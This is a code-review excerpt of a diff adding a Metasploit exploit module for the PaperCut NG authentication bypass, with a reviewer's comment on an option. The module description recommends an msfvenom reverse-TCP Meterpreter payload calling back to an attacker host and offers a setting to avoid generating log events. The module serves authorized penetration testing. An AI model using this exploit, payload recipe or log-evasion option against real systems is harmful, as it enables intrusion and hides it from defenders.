modules/exploits/multi/http/papercut_ng_auth_bypass.rb

```diff
@@ -0,0 +1,282 @@
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'debug'
+require 'cgi'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'PaperCut PaperCutNG Authentication Bypass',
+        'Description' => %q{
+          This module leverages an authentication bypass in PaperCut NG. If necessary it
+          updates Papercut configuration options, specifically the 'print-and-device.script.enabled'
+          and 'print.script.sandboxed' options to allow for arbitrary code execution running in
+          the builtin RhinoJS engine.
+
+          For code injection we utilize the URLClassLoader to load a remote URL containing a
+          ".jar" file, this file must already exist and must contain a "main" method accepting
+          no command line arguments. We recommend generating this jar file using msfvenom with a
+          java/meterpreter/reverse_tcp payload, e.g. `msfvenom -p java/meterpreter/reverse_tcp --format jar --encoder generic/none
+          LHOST=[lhost] LPORT=[lport] -o shell.jar
+
+          This module logs at most 2 events in the application log of papercut. Each event is tied
+          to modifcation of server settings. Use NEVER_SET to avoid log generation entirely when
+          targeting already vulnerable systes.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [ 'catatonicprime' ],
+        'References' => [
+          [ 'URL', 'https://www.papercut.com/kb/Main/PO-1216-and-PO-1219' ]
+        ],
+        'Targets' => [ [ 'Automatic Target', {}] ],
+        'Platform' => [ 'java' ],
+        'Payload' => {},
+        'Privileged' => true,
+        'DisclosureDate' => '2023-03-13',
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'DisablePayloadHandler' => true,
+          'PAYLOAD' => 'java/meterpreter/reverse_tcp',
+          'RPORT' => '9191',
+          'SSL' => 'false',
+          'TARGETURI' => '/app',
+          'PAYLOAD_CLASS' => 'metasploit.Payload',
+          'JAR_FILE' => '',
+          'HTTPDELAY' => 10
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'Path to the papercut application']),
+        OptString.new('PAYLOAD_CLASS', [false, 'Class containing main method to load']),
+        OptString.new('JAR_FILE', [true, 'Local path to jar file to serve, e.g. msfvenom output jar file']),
+        OptInt.new('HTTPDELAY', [false, 'Path to the papercut application']),
+        OptBool.new('NEVER_SET', [false, 'Never set server options to avoid unnecessary log events.'])
```

Comment:
this can just be removed, if we have to reconfigure the system, it is what it is.